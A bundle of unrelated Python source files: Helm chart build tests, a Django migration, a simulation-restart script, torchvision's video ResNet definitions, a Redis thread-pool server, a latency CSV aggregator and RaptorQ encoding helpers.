"values.yaml": HELM_VALUES_FILE,
"templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
"templates/service.yaml": K8S_SERVICE_TEMPLATE,
}
)
address = Address("", target_name=name)
tgt = rule_runner.get_target(address)
expected_metadata = HelmChartMetadata(
name=name,
version=version,
icon=icon,
type=type,
)
helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(tgt)])
assert not helm_chart.artifact
assert helm_chart.info == expected_metadata
assert len(helm_chart.snapshot.files) == 4
assert helm_chart.address == address
def test_override_metadata_version(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"BUILD": "helm_chart(name='foo', version='2.0.0')",
"Chart.yaml": gen_chart_file("foo", version="1.0.0"),
"values.yaml": HELM_VALUES_FILE,
"templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
"templates/service.yaml": K8S_SERVICE_TEMPLATE,
}
)
expected_metadata = HelmChartMetadata(
name="foo",
version="2.0.0",
)
address = Address("", target_name="foo")
tgt = rule_runner.get_target(address)
helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(tgt)])
assert not helm_chart.artifact
assert helm_chart.info == expected_metadata
def test_gathers_local_subchart_sources_using_explicit_dependency(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/chart1/BUILD": "helm_chart()",
"src/chart1/Chart.yaml": dedent(
"""\
apiVersion: v2
name: chart1
version: 0.1.0
"""
),
"src/chart1/values.yaml": HELM_VALUES_FILE,
"src/chart1/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
"src/chart1/templates/service.yaml": K8S_SERVICE_TEMPLATE,
"src/chart2/BUILD": "helm_chart(dependencies=['//src/chart1'])",
"src/chart2/Chart.yaml": dedent(
"""\
apiVersion: v2
name: chart2
version: 0.1.0
dependencies:
- name: chart1
alias: foo
"""
),
}
)
target = rule_runner.get_target(Address("src/chart2", target_name="chart2"))
helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(target)])
assert "charts/chart1" in helm_chart.snapshot.dirs
assert "charts/chart1/templates/service.yaml" in helm_chart.snapshot.files
assert len(helm_chart.info.dependencies) == 1
assert helm_chart.info.dependencies[0].name == "chart1"
assert helm_chart.info.dependencies[0].alias == "foo"
def test_gathers_all_subchart_sources_inferring_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"3rdparty/helm/jetstack/BUILD": dedent(
"""\
helm_artifact(
name="cert-manager",
repository="https://charts.jetstack.io",
artifact="cert-manager",
version="v0.7.0"
)
"""
),
"src/chart1/BUILD": "helm_chart()",
"src/chart1/Chart.yaml": dedent(
"""\
apiVersion: v2
name: chart1
version: 0.1.0
"""
),
"src/chart1/values.yaml": HELM_VALUES_FILE,
"src/chart1/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
"src/chart1/templates/service.yaml": K8S_SERVICE_TEMPLATE,
"src/chart2/BUILD": "helm_chart()",
"src/chart2/Chart.yaml": dedent(
"""\
apiVersion: v2
name: chart2
version: 0.1.0
dependencies:
- name: chart1
alias: dep1
- name: cert-manager
repository: "https://charts.jetstack.io"
"""
),
}
)
expected_metadata = HelmChartMetadata(
name="chart2",
api_version="v2",
version="0.1.0",
dependencies=(
HelmChartDependency(
name="chart1",
alias="dep1",
version="0.1.0",
),
HelmChartDependency(
name="cert-manager", repository="https://charts.jetstack.io", version="v0.7.0"
),
),
)
target = rule_runner.get_target(Address("src/chart2", target_name="chart2"))
helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(target)])
assert helm_chart.info == expected_metadata
assert "charts/chart1" in helm_chart.snapshot.dirs
assert "charts/chart1/templates/service.yaml" in helm_chart.snapshot.files
assert "charts/cert-manager" in helm_chart.snapshot.dirs
assert "charts/cert-manager/Chart.yaml" in helm_chart.snapshot.files
def test_chart_metadata_is_updated_with_explicit_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"3rdparty/helm/jetstack/BUILD": dedent(
"""\
helm_artifact(
name="cert-manager",
repository="https://charts.jetstack.io",
artifact="cert-manager",
version="v0.7.0"
)
"""
),
"src/chart1/BUILD": "helm_chart()",
"src/chart1/Chart.yaml": dedent(
"""\
apiVersion: v2
name: chart1
version: 0.1.0
"""
),
"src/chart2/BUILD": dedent(
"""\
helm_chart(dependencies=["//src/chart1", "//3rdparty/helm/jetstack:cert-manager"])
"""
),
"src/chart2/Chart.yaml": dedent(
"""\
apiVersion: v2
name: chart2
version: 0.1.0
"""
),
}
)
expected_metadata = HelmChartMetadata(
name="chart2",
api_version="v2",
version="0.1.0",
dependencies=(
HelmChartDependency(
name="chart1",
version="0.1.0",
),
HelmChartDependency(
name="cert-manager", version="v0.7.0", repository="https://charts.jetstack.io"
),
),
)
target = rule_runner.get_target(Address("src/chart2", target_name="chart2"))
helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(target)])
new_metadata = rule_runner.request(
HelmChartMetadata,
[
ParseHelmChartMetadataDigest(
helm_chart.snapshot.digest,
description_of_origin="test_chart_metadata_is_updated_with_explicit_dependencies",
)
],
)
assert helm_chart.info == expected_metadata
assert new_metadata == expected_metadata
def test_obtain_chart_from_deployment(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"3rdparty/helm/BUILD": dedent(
"""\
helm_artifact(
name="cert-manager",
repository="https://charts.jetstack.io/",
artifact="cert-manager",
version="v1.7.1"
)
"""
),
"src/foo/BUILD": "helm_chart()",
"src/foo/Chart.yaml": gen_chart_file("foo", version="1.0.0"),
"src/deploy/BUILD": dedent(
"""\
helm_deployment(name="first_party", dependencies=["//src/foo"])
helm_deployment(name="3rd_party", dependencies=["//3rdparty/helm:cert-manager"])
"""
),
}
)
first_party_target = rule_runner.get_target(Address("src/deploy", target_name="first_party"))
third_party_target = rule_runner.get_target(Address("src/deploy", target_name="3rd_party"))
first_party_chart = rule_runner.request(
HelmChart, [FindHelmDeploymentChart(HelmDeploymentFieldSet.create(first_party_target))]
)
assert first_party_chart.info.name == "foo"
assert first_party_chart.info.version == "1.0.0"
assert not first_party_chart.artifact
third_party_chart = rule_runner.request(
HelmChart, [FindHelmDeploymentChart(HelmDeploymentFieldSet.create(third_party_target))]
)
assert third_party_chart.info.name == "cert-manager"
assert third_party_chart.info.version == "v1.7.1"
assert third_party_chart.artifact
def test_fail_when_no_chart_dependency_is_found_for_a_deployment(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"BUILD": """helm_deployment(name="foo")"""})
target = rule_runner.get_target(Address("", target_name="foo"))
field_set = HelmDeploymentFieldSet.create(target)
msg = f"The target '{field_set.address}' is missing a dependency on a `helm_chart` or a `helm_artifact` target."
with pytest.raises(ExecutionError, match=msg):
rule_runner.request(HelmChart, [FindHelmDeploymentChart(field_set)])
def test_fail_when_more_than_one_chart_is_found_for_a_deployment(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/foo/BUILD": "helm_chart()",
"src/foo/Chart.yaml": gen_chart_file("foo", version="1.0.0"),
"src/bar/BUILD": "helm_chart()",
"src/bar/Chart.yaml": gen_chart_file("bar", version="1.0.3"),
"src/quxx/BUILD": dedent(
"""\
helm_deployment(dependencies=["//src/foo", "//src/bar"])
"""
),
}
)
target = rule_runner.get_target(Address("src/quxx"))
field_set = HelmDeploymentFieldSet.create(target)
msg = (
f"The target '{field_set.address}' has more than one `helm_chart` "
"or `helm_artifact` addresses in its dependencies, it should have only one."
)
with pytest.raises(ExecutionError, match=msg):
rule_runner.request(HelmChart, [FindHelmDeploymentChart(field_set)])
|
# Generated by Django 2.2.4 on 2019-10-12 13:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('billings', '0003_auto_20191006_1603'),
]
operations = [
migrations.AlterField(
model_name='payment',
name='receipt',
field=models.ImageField(upload_to='bankSlip/', verbose_name='Bank Slip'),
),
]
|
#!/usr/bin/python
dynamic = [0] * 101
dynamic[0] = 1
for i in range(1, 100):
for j in range(i, 101):
dynamic[j] += dynamic[j - i]
print(dynamic[100])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 14 21:59:46 2020
@author: thomas
"""
import numpy as np
import pandas as pd
import os, sys
import time as t
import subprocess
from shutil import copyfile
import pathlib
#CONSTANTS
cwd_PYTHON = os.getcwd() + '/'
# constructs a filepath for the pos data of Re = $Re
def pname(cwd):
return cwd+"startLData_Re2_.csv"
def GetLData(cwd):
data = pd.read_csv(pname(cwd),delimiter=' ')
data['parHy'] *= 2.0
data['parHx'] *= 2.0
data = data[data['parThetaBW'] <= 180.0].copy()
data = data.sort_values(by=['parThetaBW','parHx','parHy'])
data = data.reset_index(drop=True)
return data
def GetRestartIndex(cwd):
file = pathlib.Path(cwd+'pd.txt')
if file.exists():
#print('file_exists')
data = pd.read_csv(cwd+'pd.txt',delimiter=' ')
UAdata = data[data['idx'] == 6].copy()
#Sort data by time and reset indices
UAdata = UAdata.sort_values(by=['time'])
UAdata = UAdata.reset_index(drop=True)
lastData = UAdata.tail(1)
lastData = lastData.reset_index(drop=True)
endTime = lastData.loc[0,'time']
endTime = int(np.trunc(endTime))
return int(endTime*1e5)
else:
return 0
if __name__ == '__main__':
#READ NOTAList.txt to get all sims that did not complete
#Whether through error or through no end state
#Pull Hx, Hy, Theta parameters for each
#Change directory to Theta$Theta/Hx$Hx/Hy$Hy
#Modify 'script_restart.sh and copy to specified directory
#Copy input2D_restart into directory
#Submit with subprocess the command "sbatch script_restart.sh"
cwd_PYTHON = os.getcwd() + '/'
data = GetLData(cwd_PYTHON)
#Restart simulation where it left off. Some at 40s. Some at 20s.
for idx in range(len(data['endTime'])):
parTheta = np.round(data.loc[idx,'parThetaBW'],1)
parHx = np.round(data.loc[idx,'parHx'],1)
parHy = int(np.round(data.loc[idx,'parHy'],1))
#Find restart interval from pd.txt data
cwd_POS = cwd_PYTHON+'Theta{0}/Hx{1}/Hy{2}/'.format(parTheta,parHx,parHy)
restartIndex = GetRestartIndex(cwd_POS)
print('Re2: Theta={0}: Hx={1}: Hy={2}: time = {3}'.format(parTheta,parHx,parHy,restartIndex/1e5))
#Copy pd.txt as pd3.txt over to another directory
strDir = cwd_PYTHON+'PosData/Re2/Theta{0}/Hx{1}/Hy{2}/'.format(parTheta,parHx,parHy)
pathlib.Path(strDir).mkdir(parents=True, exist_ok=True)
posFile = cwd_POS+'pd.txt'
newposFile = strDir+'pd3.txt'
os.system('cp '+posFile+' '+newposFile)
|
from ._line import Line
from ._hoverlabel import Hoverlabel
from plotly.graph_objs.sankey.node import hoverlabel
|
def solution(nums):
return sorted(nums) if isinstance(nums, (list, tuple)) else []
|
from functools import partial
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import torch.nn as nn
from torch import Tensor
from ...transforms._presets import VideoClassification
from ...utils import _log_api_usage_once
from .._api import register_model, Weights, WeightsEnum
from .._meta import _KINETICS400_CATEGORIES
from .._utils import _ovewrite_named_param, handle_legacy_interface
__all__ = [
"VideoResNet",
"R3D_18_Weights",
"MC3_18_Weights",
"R2Plus1D_18_Weights",
"r3d_18",
"mc3_18",
"r2plus1d_18",
]
class Conv3DSimple(nn.Conv3d):
def __init__(
self, in_planes: int, out_planes: int, midplanes: Optional[int] = None, stride: int = 1, padding: int = 1
) -> None:
super().__init__(
in_channels=in_planes,
out_channels=out_planes,
kernel_size=(3, 3, 3),
stride=stride,
padding=padding,
bias=False,
)
@staticmethod
def get_downsample_stride(stride: int) -> Tuple[int, int, int]:
return stride, stride, stride
class Conv2Plus1D(nn.Sequential):
def __init__(self, in_planes: int, out_planes: int, midplanes: int, stride: int = 1, padding: int = 1) -> None:
super().__init__(
nn.Conv3d(
in_planes,
midplanes,
kernel_size=(1, 3, 3),
stride=(1, stride, stride),
padding=(0, padding, padding),
bias=False,
),
nn.BatchNorm3d(midplanes),
nn.ReLU(inplace=True),
nn.Conv3d(
midplanes, out_planes, kernel_size=(3, 1, 1), stride=(stride, 1, 1), padding=(padding, 0, 0), bias=False
),
)
@staticmethod
def get_downsample_stride(stride: int) -> Tuple[int, int, int]:
return stride, stride, stride
class Conv3DNoTemporal(nn.Conv3d):
def __init__(
self, in_planes: int, out_planes: int, midplanes: Optional[int] = None, stride: int = 1, padding: int = 1
) -> None:
super().__init__(
in_channels=in_planes,
out_channels=out_planes,
kernel_size=(1, 3, 3),
stride=(1, stride, stride),
padding=(0, padding, padding),
bias=False,
)
@staticmethod
def get_downsample_stride(stride: int) -> Tuple[int, int, int]:
return 1, stride, stride
class BasicBlock(nn.Module):
expansion = 1
def __init__(
self,
inplanes: int,
planes: int,
conv_builder: Callable[..., nn.Module],
stride: int = 1,
downsample: Optional[nn.Module] = None,
) -> None:
midplanes = (inplanes * planes * 3 * 3 * 3) // (inplanes * 3 * 3 + 3 * planes)
super().__init__()
self.conv1 = nn.Sequential(
conv_builder(inplanes, planes, midplanes, stride), nn.BatchNorm3d(planes), nn.ReLU(inplace=True)
)
self.conv2 = nn.Sequential(conv_builder(planes, planes, midplanes), nn.BatchNorm3d(planes))
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x: Tensor) -> Tensor:
residual = x
out = self.conv1(x)
out = self.conv2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(
self,
inplanes: int,
planes: int,
conv_builder: Callable[..., nn.Module],
stride: int = 1,
downsample: Optional[nn.Module] = None,
) -> None:
super().__init__()
midplanes = (inplanes * planes * 3 * 3 * 3) // (inplanes * 3 * 3 + 3 * planes)
# 1x1x1
self.conv1 = nn.Sequential(
nn.Conv3d(inplanes, planes, kernel_size=1, bias=False), nn.BatchNorm3d(planes), nn.ReLU(inplace=True)
)
# Second kernel
self.conv2 = nn.Sequential(
conv_builder(planes, planes, midplanes, stride), nn.BatchNorm3d(planes), nn.ReLU(inplace=True)
)
# 1x1x1
self.conv3 = nn.Sequential(
nn.Conv3d(planes, planes * self.expansion, kernel_size=1, bias=False),
nn.BatchNorm3d(planes * self.expansion),
)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x: Tensor) -> Tensor:
residual = x
out = self.conv1(x)
out = self.conv2(out)
out = self.conv3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class BasicStem(nn.Sequential):
"""The default conv-batchnorm-relu stem"""
def __init__(self) -> None:
super().__init__(
nn.Conv3d(3, 64, kernel_size=(3, 7, 7), stride=(1, 2, 2), padding=(1, 3, 3), bias=False),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
class R2Plus1dStem(nn.Sequential):
"""R(2+1)D stem is different than the default one as it uses separated 3D convolution"""
def __init__(self) -> None:
super().__init__(
nn.Conv3d(3, 45, kernel_size=(1, 7, 7), stride=(1, 2, 2), padding=(0, 3, 3), bias=False),
nn.BatchNorm3d(45),
nn.ReLU(inplace=True),
nn.Conv3d(45, 64, kernel_size=(3, 1, 1), stride=(1, 1, 1), padding=(1, 0, 0), bias=False),
nn.BatchNorm3d(64),
nn.ReLU(inplace=True),
)
class VideoResNet(nn.Module):
def __init__(
self,
block: Type[Union[BasicBlock, Bottleneck]],
conv_makers: Sequence[Type[Union[Conv3DSimple, Conv3DNoTemporal, Conv2Plus1D]]],
layers: List[int],
stem: Callable[..., nn.Module],
num_classes: int = 400,
zero_init_residual: bool = False,
) -> None:
"""Generic resnet video generator.
Args:
block (Type[Union[BasicBlock, Bottleneck]]): resnet building block
conv_makers (List[Type[Union[Conv3DSimple, Conv3DNoTemporal, Conv2Plus1D]]]): generator
function for each layer
layers (List[int]): number of blocks per layer
stem (Callable[..., nn.Module]): module specifying the ResNet stem.
num_classes (int, optional): Dimension of the final FC layer. Defaults to 400.
zero_init_residual (bool, optional): Zero init bottleneck residual BN. Defaults to False.
"""
super().__init__()
_log_api_usage_once(self)
self.inplanes = 64
self.stem = stem()
self.layer1 = self._make_layer(block, conv_makers[0], 64, layers[0], stride=1)
self.layer2 = self._make_layer(block, conv_makers[1], 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, conv_makers[2], 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, conv_makers[3], 512, layers[3], stride=2)
self.avgpool = nn.AdaptiveAvgPool3d((1, 1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
# init weights
for m in self.modules():
if isinstance(m, nn.Conv3d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm3d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0) # type: ignore[union-attr, arg-type]
def forward(self, x: Tensor) -> Tensor:
x = self.stem(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
# Flatten the layer to fc
x = x.flatten(1)
x = self.fc(x)
return x
def _make_layer(
self,
block: Type[Union[BasicBlock, Bottleneck]],
conv_builder: Type[Union[Conv3DSimple, Conv3DNoTemporal, Conv2Plus1D]],
planes: int,
blocks: int,
stride: int = 1,
) -> nn.Sequential:
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
ds_stride = conv_builder.get_downsample_stride(stride)
downsample = nn.Sequential(
nn.Conv3d(self.inplanes, planes * block.expansion, kernel_size=1, stride=ds_stride, bias=False),
nn.BatchNorm3d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, conv_builder, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, conv_builder))
return nn.Sequential(*layers)
def _video_resnet(
block: Type[Union[BasicBlock, Bottleneck]],
conv_makers: Sequence[Type[Union[Conv3DSimple, Conv3DNoTemporal, Conv2Plus1D]]],
layers: List[int],
stem: Callable[..., nn.Module],
weights: Optional[WeightsEnum],
progress: bool,
**kwargs: Any,
) -> VideoResNet:
if weights is not None:
_ovewrite_named_param(kwargs, "num_classes", len(weights.meta["categories"]))
model = VideoResNet(block, conv_makers, layers, stem, **kwargs)
if weights is not None:
model.load_state_dict(weights.get_state_dict(progress=progress, check_hash=True))
return model
_COMMON_META = {
"min_size": (1, 1),
"categories": _KINETICS400_CATEGORIES,
"recipe": "https://github.com/pytorch/vision/tree/main/references/video_classification",
"_docs": (
"The weights reproduce closely the accuracy of the paper. The accuracies are estimated on video-level "
"with parameters `frame_rate=15`, `clips_per_video=5`, and `clip_len=16`."
),
}
class R3D_18_Weights(WeightsEnum):
KINETICS400_V1 = Weights(
url="https://download.pytorch.org/models/r3d_18-b3b3357e.pth",
transforms=partial(VideoClassification, crop_size=(112, 112), resize_size=(128, 171)),
meta={
**_COMMON_META,
"num_params": 33371472,
"_metrics": {
"Kinetics-400": {
"acc@1": 63.200,
"acc@5": 83.479,
}
},
"_ops": 40.697,
"_file_size": 127.359,
},
)
DEFAULT = KINETICS400_V1
class MC3_18_Weights(WeightsEnum):
KINETICS400_V1 = Weights(
url="https://download.pytorch.org/models/mc3_18-a90a0ba3.pth",
transforms=partial(VideoClassification, crop_size=(112, 112), resize_size=(128, 171)),
meta={
**_COMMON_META,
"num_params": 11695440,
"_metrics": {
"Kinetics-400": {
"acc@1": 63.960,
"acc@5": 84.130,
}
},
"_ops": 43.343,
"_file_size": 44.672,
},
)
DEFAULT = KINETICS400_V1
class R2Plus1D_18_Weights(WeightsEnum):
KINETICS400_V1 = Weights(
url="https://download.pytorch.org/models/r2plus1d_18-91a641e6.pth",
transforms=partial(VideoClassification, crop_size=(112, 112), resize_size=(128, 171)),
meta={
**_COMMON_META,
"num_params": 31505325,
"_metrics": {
"Kinetics-400": {
"acc@1": 67.463,
"acc@5": 86.175,
}
},
"_ops": 40.519,
"_file_size": 120.318,
},
)
DEFAULT = KINETICS400_V1
@register_model()
@handle_legacy_interface(weights=("pretrained", R3D_18_Weights.KINETICS400_V1))
def r3d_18(*, weights: Optional[R3D_18_Weights] = None, progress: bool = True, **kwargs: Any) -> VideoResNet:
"""Construct 18 layer Resnet3D model.
.. betastatus:: video module
Reference: `A Closer Look at Spatiotemporal Convolutions for Action Recognition <https://arxiv.org/abs/1711.11248>`__.
Args:
weights (:class:`~torchvision.models.video.R3D_18_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.video.R3D_18_Weights`
below for more details, and possible values. By default, no
pre-trained weights are used.
progress (bool): If True, displays a progress bar of the download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.video.resnet.VideoResNet`` base class.
Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/video/resnet.py>`_
for more details about this class.
.. autoclass:: torchvision.models.video.R3D_18_Weights
:members:
"""
weights = R3D_18_Weights.verify(weights)
return _video_resnet(
BasicBlock,
[Conv3DSimple] * 4,
[2, 2, 2, 2],
BasicStem,
weights,
progress,
**kwargs,
)
@register_model()
@handle_legacy_interface(weights=("pretrained", MC3_18_Weights.KINETICS400_V1))
def mc3_18(*, weights: Optional[MC3_18_Weights] = None, progress: bool = True, **kwargs: Any) -> VideoResNet:
"""Construct 18 layer Mixed Convolution network as in
.. betastatus:: video module
Reference: `A Closer Look at Spatiotemporal Convolutions for Action Recognition <https://arxiv.org/abs/1711.11248>`__.
Args:
weights (:class:`~torchvision.models.video.MC3_18_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.video.MC3_18_Weights`
below for more details, and possible values. By default, no
pre-trained weights are used.
progress (bool): If True, displays a progress bar of the download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.video.resnet.VideoResNet`` base class.
Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/video/resnet.py>`_
for more details about this class.
.. autoclass:: torchvision.models.video.MC3_18_Weights
:members:
"""
weights = MC3_18_Weights.verify(weights)
return _video_resnet(
BasicBlock,
[Conv3DSimple] + [Conv3DNoTemporal] * 3, # type: ignore[list-item]
[2, 2, 2, 2],
BasicStem,
weights,
progress,
**kwargs,
)
@register_model()
@handle_legacy_interface(weights=("pretrained", R2Plus1D_18_Weights.KINETICS400_V1))
def r2plus1d_18(*, weights: Optional[R2Plus1D_18_Weights] = None, progress: bool = True, **kwargs: Any) -> VideoResNet:
"""Construct 18 layer deep R(2+1)D network as in
.. betastatus:: video module
Reference: `A Closer Look at Spatiotemporal Convolutions for Action Recognition <https://arxiv.org/abs/1711.11248>`__.
Args:
weights (:class:`~torchvision.models.video.R2Plus1D_18_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.video.R2Plus1D_18_Weights`
below for more details, and possible values. By default, no
pre-trained weights are used.
progress (bool): If True, displays a progress bar of the download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.video.resnet.VideoResNet`` base class.
Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/video/resnet.py>`_
for more details about this class.
.. autoclass:: torchvision.models.video.R2Plus1D_18_Weights
:members:
"""
weights = R2Plus1D_18_Weights.verify(weights)
return _video_resnet(
BasicBlock,
[Conv2Plus1D] * 4,
[2, 2, 2, 2],
R2Plus1dStem,
weights,
progress,
**kwargs,
)
# The dictionary below is internal implementation detail and will be removed in v0.15
from .._utils import _ModelURLs
model_urls = _ModelURLs(
{
"r3d_18": R3D_18_Weights.KINETICS400_V1.url,
"mc3_18": MC3_18_Weights.KINETICS400_V1.url,
"r2plus1d_18": R2Plus1D_18_Weights.KINETICS400_V1.url,
}
)
|
# @Time : 2018-10-24
# @Author : zxh
from zutils.zrpc.zmq.redismq import RedisMQ
import traceback
import time
import threading
class AbstractServer:
# def handle1(self, task):
# return {'key':'value'}
def requests_map(self):
return {
'handle1': {
'func': 'xxx',
'max': 10
}
}
class ThreadpoolServer:
def __init__(self, register_address, server_instance_list, logger, protocol, thread_num=1):
self.server_instance_list = server_instance_list
self.logger = logger
self.requests_map = dict()
self.protocol = protocol
self.thread_num = thread_num
self.register_address = register_address
self.task_names = list()
self.max_queue_list = list()
for server_instance in server_instance_list:
name_func_dict = server_instance.requests_map()
for task_name in name_func_dict:
if self.requests_map.get(task_name) is not None:
raise Exception('task_name ' + task_name + ' is not only')
self.requests_map[task_name] = name_func_dict[task_name]['func']
self.task_names.append(task_name)
self.max_queue_list.append(name_func_dict[task_name]['max'])
def work_thread(self):
rmq = RedisMQ(self.register_address, 30)
while True:
try:
request = rmq.pop(self.task_names, self.protocol, False)
if request is None:
self.logger().info('free')
continue
try:
result = self.requests_map[request.task_name](request.task)
request.response_succ(result)
except Exception as e:
request.response_error(str(e))
except:
self.logger().error('%s' % traceback.format_exc())
time.sleep(1)
def heartbeat_thread(self):
rmq = RedisMQ(self.register_address, 30)
while True:
try:
for task_name, max_size in zip(self.task_names, self.max_queue_list):
rmq.set_queue_maxsize(task_name, max_size, 30)
except:
self.logger().error('%s' % traceback.format_exc())
time.sleep(1)
time.sleep(15)
def start(self):
heartbeat = threading.Thread(target=self.heartbeat_thread)
heartbeat.start()
if self.thread_num == 1:
self.work_thread()
else:
work_thread_list = list()
for i in range(self.thread_num):
t = threading.Thread(target=self.work_thread)
work_thread_list.append(t)
t.start()
while True:
time.sleep(5)
|
#!/usr/bin/env python
import sys, csv, glob, re
def build_latencies(stats_arr, filename):
i = 0
with open(filename, 'rb') as summary_file:
reader = csv.reader(summary_file)
reader.next() #skip header line
for row in reader:
row = map(str.strip, row)
vals = map(float, row)
elapsed, window, n, minimum, mean, median, nine5, nine9, nine9_9, maximum, errors = vals[:11]
if len(stats_arr) <= i:
stats_arr.append([elapsed, window, n, minimum, mean, median, nine5, nine9, nine9_9, maximum, errors])
else:
stats_arr[i][0] = (stats_arr[i][0] + float(elapsed)) / 2
stats_arr[i][1] = (stats_arr[i][1] + window) / 2
stats_arr[i][2] = int(stats_arr[i][2] + n)
stats_arr[i][3] = int(min(stats_arr[i][3], minimum))
stats_arr[i][4] = (stats_arr[i][4] + mean) / 2
stats_arr[i][5] = int((stats_arr[i][5] + median) / 2)
stats_arr[i][6] = int((stats_arr[i][6] + nine5) / 2)
stats_arr[i][7] = int((stats_arr[i][7] + nine9) / 2)
stats_arr[i][8] = int((stats_arr[i][8] + nine9_9) / 2)
stats_arr[i][9] = int(max(stats_arr[i][9], maximum))
stats_arr[i][10] = int(stats_arr[i][10] + errors)
i += 1
return stats_arr
def build_summary(stats_arr, filename):
i = 0
with open(filename, 'rb') as summary_file:
reader = csv.reader(summary_file)
reader.next() #skip header line
for row in reader:
row = map(str.strip, row)
vals = map(float, row)
elapsed, window, total, successful, failed = vals[:5]
if len(stats_arr) <= i:
stats_arr.append([elapsed, window, total, successful, failed])
else:
stats_arr[i][0] = (stats_arr[i][0] + float(elapsed)) / 2
stats_arr[i][1] = (stats_arr[i][1] + window) / 2
stats_arr[i][2] = int(stats_arr[i][2] + total)
stats_arr[i][3] = int(stats_arr[i][3] + successful)
stats_arr[i][4] = int(stats_arr[i][4] + failed)
i += 1
return stats_arr
results_base_dir = sys.argv[1]
latency_dict = {}
for latency_file in glob.glob(results_base_dir + "/*/*latencies.csv"):
matchObj = re.match( r'(.*)\/(.*)\/(.*)', latency_file, re.M|re.I)
if matchObj:
latency_dict[matchObj.group(3)] = []
#Write Latencies
for latency_name in latency_dict:
for latency_file in glob.glob(results_base_dir + "/*/" + latency_name):
stats_arr = build_latencies(latency_dict[latency_name], latency_file)
f = open(latency_name, 'w')
f.write("elapsed, window, n, min, mean, median, 95th, 99th, 99_9th, max, errors\n")
for row in stats_arr:
f.write(','.join(map(str,row)) + '\n')
f.close
#Write Summary
stats_arr = []
for stat_file in glob.glob(results_base_dir + "/*/summary.csv"):
stats_arr = build_summary(stats_arr, stat_file)
f = open('summary.csv', 'w')
f.write("elapsed, window, total, successful, failed\n")
for row in stats_arr:
f.write(','.join(map(str,row)) + '\n')
f.close |
import math
import constants
import operator
from bitarray import bitarray
from octet_array import octet_array
def tuples(encoder, X):
'''
Generate encoding tuples as described here http://tools.ietf.org/html/rfc6330#section-5.3.5.4
'''
A = 53591 + encoder.J*997
if A%2 == 0:
A += 1
B = 10267*(encoder.J+1)
y = int((B + X*A) % math.pow(2,32))
v = random(y, 0, math.pow(2, 20))
d = degree(v, encoder.W)
if d is None:
raise Exception("Error producing value d from y=%d and W=%d" % (y, encoder.W))
a = 1 + random(y, 1, encoder.W-1)
b = random(y, 2, encoder.W)
if d < 4:
d1 = 2 + random(X, 3, 2)
else:
d1 = 2
a1 = 1 + random(X, 4, encoder.P1-1)
b1 = random(X, 5, encoder.P1)
return (d, a, b, d1, a1, b1)
def random(y, i, m):
'''
Pseudo random numbers as described here http://tools.ietf.org/html/rfc6330#section-5.3.5.1
'''
x0 = int( (y + i) % math.pow(2, 8) )
x1 = int( (math.floor( y/math.pow(2, 8) ) + i) % math.pow(2, 8) )
x2 = int( (math.floor( y/math.pow(2, 16) ) + i) % math.pow(2, 8) )
x3 = int( (math.floor( y/math.pow(2, 24) ) + i) % math.pow(2, 8) )
v0 = constants.V0[int(x0)]
v1 = constants.V1[int(x1)]
v2 = constants.V2[int(x2)]
v3 = constants.V3[int(x3)]
v01 = operator.xor(v0, v1)
v012 = operator.xor(v01, v2)
v0123 = operator.xor(v012, v3)
ret_rand = v0123 % m
return ret_rand
def degree(v, W):
"""
Generate degree based on http://tools.ietf.org/html/rfc6330#section-5.3.5.2
If v is out of range return None
"""
if v >= 1048576:
return None
f = constants.f
d = None
for i in xrange(len(f)):
if v < f[i]:
d = i
break
if d < (W-2):
return d
